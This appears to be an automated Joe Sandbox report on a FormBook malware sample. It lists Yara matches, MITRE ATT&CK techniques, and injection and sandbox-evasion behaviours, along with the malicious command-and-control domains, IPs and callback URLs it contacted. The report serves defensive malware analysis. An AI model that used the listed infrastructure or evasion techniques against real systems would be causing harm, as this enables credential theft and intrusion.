          Source: Yara match | File source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.416309209.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.597782419.0000000000750000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.597893599.0000000000780000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.342749345.0000000002290000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 0.2.5t2CmTUhKc.exe.2290000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.1.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.1.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.5t2CmTUhKc.exe.2290000.3.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.416309209.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.597782419.0000000000750000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.597893599.0000000000780000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.342749345.0000000002290000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 0.2.5t2CmTUhKc.exe.2290000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.1.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.1.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.5t2CmTUhKc.exe.2290000.3.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Native API1 | Path Interception | Process Injection512 | Virtualization/Sandbox Evasion3 | OS Credential Dumping | Security Software Discovery131 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot1
          Default Accounts | Shared Modules1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection512 | LSASS Memory | Virtualization/Sandbox Evasion3 | Remote Desktop Protocol | Clipboard Data1 | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information1 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information3 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing11 | LSA Secrets | File and Directory Discovery2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery13 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |

          Behavior Graph

          Behavior Graph ID: 433074 | Sample: 5t2CmTUhKc.exe | Startdate: 11/06/2021 | Architecture: WINDOWS | Score: 100
          (graph image not preserved; node contents recovered below)
          Start node: contacted www.t4mall.com; signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 5 other signatures; started 5t2CmTUhKc.exe
          5t2CmTUhKc.exe: dropped C:\Users\user\AppData\Local\...\System.dll (PE32); signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; started 5t2CmTUhKc.exe
          5t2CmTUhKc.exe (second instance): signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection); started help.exe; injected explorer.exe
          help.exe: signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; started cmd.exe
          explorer.exe (injected): purpleqube.com 119.81.95.146, 49751, 80, SOFTLAYERUS Singapore; www.xn---yado-8e4dze0c.site 150.95.255.38, 49753, 80, INTERQGMOInternetIncJP Japan; 9 other IPs or domains; signature: System process connects to network (likely due to code injection or exploit)
          cmd.exe: started conhost.exe


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          5t2CmTUhKc.exe | 29% | Virustotal |
          5t2CmTUhKc.exe | 28% | ReversingLabs |
          5t2CmTUhKc.exe | 100% | Joe Sandbox ML |

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\nse5FEA.tmp\System.dll | 0% | Metadefender |
          C:\Users\user\AppData\Local\Temp\nse5FEA.tmp\System.dll | 0% | ReversingLabs |

          Unpacked PE Files

          Source | Detection | Scanner | Label
          0.0.5t2CmTUhKc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482
          0.2.5t2CmTUhKc.exe.2290000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          2.2.5t2CmTUhKc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          11.2.help.exe.4ed3f8.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
          2.0.5t2CmTUhKc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482
          0.2.5t2CmTUhKc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482
          11.2.help.exe.35c7960.5.unpack | 100% | Avira | TR/Patched.Ren.Gen
          2.1.5t2CmTUhKc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          http://www.thechandeck.com/bp3i/?o6tTHHhh=p3NsgK4BERuThhH+teqwS1C0txfpjFxawwSOzHNPnDrrCpY7gJP96rzPXZQ9m0/nBd8sZePfaw==&3fuD_=S2MtYLGX0vFd | 100% | Avira URL Cloud | malware
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.purpleqube.com/bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8EtbmnhqlSQaIYanfFQnQ==&3fuD_=S2MtYLGX0vFd | 100% | Avira URL Cloud | phishing
          http://www.tiro.com | 0% | URL Reputation | safe
          www.oceancollaborative.com/bp3i/ | 0% | Avira URL Cloud | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.middreampostal.com/bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=IptNrmuXUVaV/Z9910/N9dyZxtPI5jyScGKXmfxiWqbBXO2QZbfIAu6+lQXyF1DTVkAc6YCxuQ== | 0% | Avira URL Cloud | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          https://www.purpleqube.com/bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vz | 100% | Avira URL Cloud | phishing
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.xn---yado-8e4dze0c.site/bp3i/?o6tTHHhh=G/6vsm0KxG9qmRdgnTa4hWK9fX8ri3vqlPmeKNZjc+yTORxazFkMTyGVd6qzkwgGx7fuosCohA==&3fuD_=S2MtYLGX0vFd | 0% | Avira URL Cloud | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          http://www.bancambios.network/bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=So2Tvg87hIziEtO/Cru7EIQwZdKNOPQNXuBCwKB1xQ7qfTi1ynPiyI53Zc3PyJmgTVsVUbeTjw== | 0% | Avira URL Cloud | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.t4mall.com | 165.3.53.250 | true | false | | unknown
          bancambios.network | 185.224.138.83 | true | true | | unknown
          purpleqube.com | 119.81.95.146 | true | true | | unknown
          www.xn---yado-8e4dze0c.site | 150.95.255.38 | true | true | | unknown
          www.thechandeck.com | 154.215.150.183 | true | true | | unknown
          middreampostal.com | 184.175.83.64 | true | true | | unknown
          oceancollaborative.com | 184.168.131.241 | true | true | | unknown
          www.middreampostal.com | unknown | unknown | true | | unknown
          www.purpleqube.com | unknown | unknown | true | | unknown
          www.oceancollaborative.com | unknown | unknown | true | | unknown
          www.bancambios.network | unknown | unknown | true | | unknown
          www.bluebeltpanobuy.com | unknown | unknown | true | | unknown

                                  Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.thechandeck.com/bp3i/?o6tTHHhh=p3NsgK4BERuThhH+teqwS1C0txfpjFxawwSOzHNPnDrrCpY7gJP96rzPXZQ9m0/nBd8sZePfaw==&3fuD_=S2MtYLGX0vFd | true | Avira URL Cloud: malware | unknown
          http://www.purpleqube.com/bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8EtbmnhqlSQaIYanfFQnQ==&3fuD_=S2MtYLGX0vFd | true | Avira URL Cloud: phishing | unknown
          www.oceancollaborative.com/bp3i/ | true | Avira URL Cloud: safe | low
          http://www.middreampostal.com/bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=IptNrmuXUVaV/Z9910/N9dyZxtPI5jyScGKXmfxiWqbBXO2QZbfIAu6+lQXyF1DTVkAc6YCxuQ== | true | Avira URL Cloud: safe | unknown
          http://www.xn---yado-8e4dze0c.site/bp3i/?o6tTHHhh=G/6vsm0KxG9qmRdgnTa4hWK9fX8ri3vqlPmeKNZjc+yTORxazFkMTyGVd6qzkwgGx7fuosCohA==&3fuD_=S2MtYLGX0vFd | true | Avira URL Cloud: safe | unknown
          http://www.bancambios.network/bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=So2Tvg87hIziEtO/Cru7EIQwZdKNOPQNXuBCwKB1xQ7qfTi1ynPiyI53Zc3PyJmgTVsVUbeTjw== | true | Avira URL Cloud: safe | unknown

                                  URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://www.autoitscript.com/autoit3/J | explorer.exe, 00000005.00000000.344027143.000000000095C000.00000004.00000020.sdmp | false | | high
          http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com | explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com/designersG | explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com/designers/? | explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | false | | high
          http://www.founder.com.cn/cn/bThe | explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css | help.exe, 0000000B.00000002.599307381.0000000003742000.00000004.00000001.sdmp | false | | high
          http://www.fontbureau.com/designers? | explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | false | | high
          http://www.tiro.com | explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers | explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | false | | high
          http://nsis.sf.net/NSIS_ErrorError | 5t2CmTUhKc.exe | false | | high
          http://www.goodfont.co.kr | explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          https://afternic.com/forsale/oceancollaborative.com?utm_source=TDFS&utm_medium=sn_affiliate_click&ut | help.exe, 0000000B.00000002.599307381.0000000003742000.00000004.00000001.sdmp | false | | high
          http://www.carterandcone.coml | explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.sajatypeworks.com | explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          https://www.purpleqube.com/bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vz | help.exe, 0000000B.00000002.599307381.0000000003742000.00000004.00000001.sdmp | true | Avira URL Cloud: phishing | unknown
          http://www.typography.netD | explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | false | | high
          http://www.founder.com.cn/cn/cThe | explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://fontfabrik.com | explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.founder.com.cn/cn | explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmp | false | | high
          http://nsis.sf.net/NSIS_Error | 5t2CmTUhKc.exe | false | |
                                                            high
                                                            http://www.jiyu-kobo.co.jp/explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.fontbureau.com/designers8explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://www.fonts.comexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                high
                                                                http://www.sandoll.co.krexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://dfltweb1.onamae.comhelp.exe, 0000000B.00000002.599307381.0000000003742000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://www.urwpp.deDPleaseexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.zhongyicts.com.cnexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.sakkal.comexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown

                                                                  Contacted IPs


                                                                  Public

IP | Domain | Country | ASN | ASN Name | Malicious
184.175.83.64 | middreampostal.com | United States | 7393 | CYBERCONUS | true
185.224.138.83 | bancambios.network | Germany | 47583 | AS-HOSTINGERLT | true
119.81.95.146 | purpleqube.com | Singapore | 36351 | SOFTLAYERUS | true
184.168.131.241 | oceancollaborative.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
154.215.150.183 | www.thechandeck.com | Seychelles | 134548 | DXTL-HKDXTLTseungKwanOServiceHK | true
150.95.255.38 | www.xn---yado-8e4dze0c.site | Japan | 7506 | INTERQGMOInternetIncJP | true

                                                                  General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 433074
Start date: 11.06.2021
Start time: 08:52:39
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 10s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 5t2CmTUhKc.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 25
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@8/4@11/6
EGA Information: Failed
HDC Information:
• Successful, ratio: 25.6% (good quality ratio 23.3%)
• Quality average: 76.4%
• Quality standard deviation: 30.6%
HCA Information:
• Successful, ratio: 90%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 52.255.188.83, 204.79.197.200, 13.107.21.200, 168.61.161.212, 92.122.145.220, 104.43.139.144, 20.50.102.62, 20.54.104.15, 20.54.26.129, 92.122.213.247, 92.122.213.194, 23.218.208.56, 20.82.210.154
                                                                  • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed, report is missing behavior information

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  No simulations

                                                                  Joe Sandbox View / Context

                                                                  IPs

Match | Associated Sample Name / URL | Detection | Context
185.224.138.83
• Updated April SOA.xlsx | malicious | www.solocubiertos.com/hx3a/?BDH=h8HIR/JRNjzDsSWIWUzNg2gIEcYDeeAucgYL/MnDjD1L6VW+knLzJM/v5Dkqg23ga+J5Og==&SH6=u2JtglFH
119.81.95.146
• a8eC6O6okf.exe | malicious | www.purpleqube.com/bp3i/?PF=5jiDaNi8a4RT0&V0Gp=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8EtblLbpk+rZ/5L
184.168.131.241
• DNPr7t0GMY.exe | malicious | www.thriveglucose.com/p2io/?1bs8=cR-P8LD8&-Z0xlN=bgEje2qoIMshrcRflwWQjpUULYzLZlDcA+elzyDX4pz+rZVwSlMQ2+HN9bOaKrviR/d6
• 5SXTKXCnqS.exe | malicious | www.centerstageacademyaz.com/hlx/?wVSH=B58lx/xaXAfqMrblDg0CPLD4IpEHx1MuvfXEetjmXTR5BJPCAvCKa/uMIPwGmDqbiG+v&i0D=adKPlr
• AWB00028487364 -000487449287.doc | malicious | www.centerstageacademyaz.com/hlx/?5jSp=B58lx/xfXHfuM7XpBg0CPLD4IpEHx1MuvfPUCu/nTzR4B4jEH/TGM7WOLp8Aty+Q3gKYZw==&JR-laV=zN90U
• #U00a0Import Custom Duty invoice & its clearance documents.exe | malicious | www.mnanoramaonline.com/dp3a/?6l6x=JpPDbdpPqJah&F4ClVX_=HMSedmBm6/hIWbSmMxUxYZbRrtDTwFsk+TyYRjGVNzdErelZVoFwy82MvW0W4Pxo5ExE
• Payment receipt MT103.exe | malicious | www.2006almadenrd.com/n86i/?3fDpH=EncZcG68c0UFvrfaep8p5kHr59rKeBqDHDmJoTlHDlH5Q19q6THcE1BV1jQP2/4tmveZ&Vjo=1bT0vz7
• New Order.exe | malicious | www.flockuplabs.com/uqf5/?mVS=CH5D6h5PGn4ts&3fCDL=kpO7L1Lkp8iY+ON3mW6Oq8CK0aWMRalGagQzJa0PwjziroypQJ68geE/ArNV1zcwD6YY
• NEW ORDER ZIP.exe | malicious | www.cohorsetrails.com/j7e/?iP_T-V=s4TxBF2&F8EdvhY=0uFKBmvmOY3N1cR6tfDjvpZ4XCwo5tCp3URJWx4vIEcYZHH/ZYklCf5hgzXfIPGP0WLm
• oVA5JBAJutcna88.exe | malicious | www.covid-19-411.com/c6ss/?P6AT72s=DB71Bym9Rr14TfwtieeaSq+XP6MPPP3k6OJ3eYsEhcCNhSwkByfhm8SfoYhSpsTVm4Za&j6A4qv=gJBt3
• qXDtb88hht.exe | malicious | www.thriveglucose.com/p2io/?Z8E=bgEje2qoIMshrcRflwWQjpUULYzLZlDcA+elzyDX4pz+rZVwSlMQ2+HN9bOaKrviR/d6&b0GDi6=Q6Ahtfox
• a8eC6O6okf.exe | malicious | www.oceancollaborative.com/bp3i/?PF=5jiDaNi8a4RT0&V0Gp=+tA82deiMnBv5x6tQvXabF4qHjy6FJLdLGXe/FevxPH8etKnEP6uMBOxOeXG6ZsHsCfG
• Telex_Payment.exe | malicious | www.avaatraelegant.com/m3rc/?hTk8tpm=TSQTGbGl+UafldaDY7iOrPnVdHYt9Ypfw/QiU1mtcNJ1KwINQbFG4EVzsaDm0ZQusGTd&I4=5jxX5BaX4hy8-j8
• QyKNw7NioL.exe | malicious | www.thriveglucose.com/p2io/?m4=PditjTvx4PwX_x-&aBd=bgEje2qoIMshrcRflwWQjpUULYzLZlDcA+elzyDX4pz+rZVwSlMQ2+HN9YuKFK/aPa09
• Payment_Advice.exe | malicious | www.ingenious.care/uqf5/?9rw=IyvMBxqM8mznciPJtkomKlfF/kq/6zAZ/NulsdYJ5cntVs/S9fIvdvtMsAQ76USE273s&s6=bPYXfd3Xq0VHDp
• SOA #093732.exe | malicious | www.xn--arepasantabrbara-pmb.com/hme1/?jPw=2SPw7LQlaa7cti3Mn2rz6TCjd7lU8jHnPITUh2R4n2dBA+x2SVgAgss/958kYo9ATjis&y2JhS=6lr41hZpgNXtF
• rHk5KU7bfT.exe | malicious | www.rvvikings.com/dxe/?TfTl=jHjQ1sEHwNXw4n+A/8fpKnaO6SpchAkuZ+GgFHi7AN8kb2XA0i8OmoFepGcQzHHYqc9c&7nGt5=h6Altfix
• Order.exe | malicious | www.complexscale.net/jogt/?w6ATB0=mM0Ck4zU/d9hG5lVEWeH7uQPwyvlCbjgstqvdurAh1ZdTH4Yqc2sgGmD0X7Q/SemRdxv&Jxox=Er6tXhMxl
• VubYcOdGjQ.exe | malicious | www.theguyscave.com/k8n/?wR-T-=ETYdeRC&5jn=ffRSpgj0URUgPhDkzfA3YdlDQQz5pJJRybkyQxcySljT84fGDbAnWSnhJv/zp2N19SZb
• Payment_Advice.exe | malicious | www.getthistle.com/q4kr/?w2MLb=6lux&QtRl=Jt1JO2t971959LrdDM/EJ1cvA97Pwm/HDqPg7v3P69I8XU+CUZlUHoU2RjaRLLQwrinB
• Neworder.exe | malicious | www.kanitanaillounge.com/jogt/?PlQ8j=jKXq1ZQHcPBM/dFmsG96Rrq7SiC5kuIPSSiD8Dd2ip+Nb1yUpyUL4OnIzbOoJzgaBXqf&2db=g0G0iLxxPHIT
• Request for Price W912D2-19-Q-0004.exe | malicious | www.blackwomencamp.net/egem/?2dCHQ=s0ILlWrMQzsGp3p1RmAY3qUukEAkmJAYYPkleJQvQBxBfoOdmLxTHansmvlw5WkCayf3&7nDtA=f2JDOtyx2xtDzteP

                                                                  Domains

Match | Associated Sample Name / URL | Detection | Context

                                                                  ASN

Match | Associated Sample Name / URL | Detection | Context
CYBERCONUS
• sample.exe | malicious | 184.175.106.113
• tS9P6wPz9x.exe | malicious | 184.175.106.113
• ransomware.exe | malicious | 184.175.106.113
• ransomware.exe | malicious | 184.175.106.113
• gc79a7rUNV.exe | malicious | 184.175.106.113
• CONSTANTINE.xlsx | malicious | 216.15.213.195
• 08142020_1463075702.doc | malicious | 66.201.98.191
• http://srconsultingsrv.com/wp-admin/open-9c-pqmgpgy9fo4mnwz/verifiable-area/10bpikjgd-32105y0ut8/ | malicious | 184.175.123.49
• SecuriteInfo.com.W97m.Downloader.IWY.30727.doc | malicious | 216.198.213.62
• SecuriteInfo.com.W97m.Downloader.IWY.30727.doc | malicious | 216.198.213.62
AS-HOSTINGERLT
• Proforma Inv.xlsx | malicious | 156.67.222.136
• qXDtb88hht.exe | malicious | 185.224.137.223
• 8mnXkjPdP0.exe | malicious | 46.17.172.65
• SecuriteInfo.com.Scr.Malcodegdn30.8880.exe | malicious | 2.57.89.36
• Shipping Docs677.exe | malicious | 31.170.161.109
• item.exe | malicious | 45.13.255.9
• RFQ_BRAT_METAL_TECH_LTD.exe | malicious | 45.13.255.9
• POSWM240521.exe | malicious | 45.13.255.9
• XmN6faVV2b.exe | malicious | 193.168.194.233
• fbfcbf13_by_Libranalysis.exe | malicious | 46.17.172.35
• EJIMS.exe | malicious | 45.130.231.56
• bin.exe | malicious | 185.224.137.223
• Purchase Order.exe | malicious | 185.201.11.161
• netwire.exe | malicious | 185.224.137.223
• O64Hou5qAF.exe | malicious | 185.224.137.223
• PurchaseOrder#657Y200.exe | malicious | 2.57.89.36
• noSpfWQqRD.exe | malicious | 185.224.137.223
• 94f0319a_by_Libranalysis.exe | malicious | 194.59.164.91
• 0e12ea4a_by_Libranalysis.dll | malicious | 195.110.59.2
• WLApa6bpDLcT5Ne.exe | malicious | 46.17.172.65
SOFTLAYERUS
• Ref#Doc30504871 Wyg.htm | malicious | 169.55.190.245
• 7 #U039c#U0456#U0455#U0455#U0435d #U0441#U0430II#U0455.htm | malicious | 169.46.118.100
• ManyToOneMailMerge Ver 18.2.dotm | malicious | 159.253.128.188
• 06.08.21 Inv & AP Statement - Copy.htm | malicious | 169.46.89.154
• Payment slip.exe | malicious | 169.56.29.200
• a8eC6O6okf.exe | malicious | 119.81.95.146
• Windows Defender#U68c0#U67e5#U5de5#U5177.exe | malicious | 50.23.197.95
• #U266b Audio_47920.wavv - - Copy.html | malicious | 169.47.124.25
• BS.exe | malicious | 103.226.228.233
• American Freight Payment Advice.html | malicious | 169.47.124.25
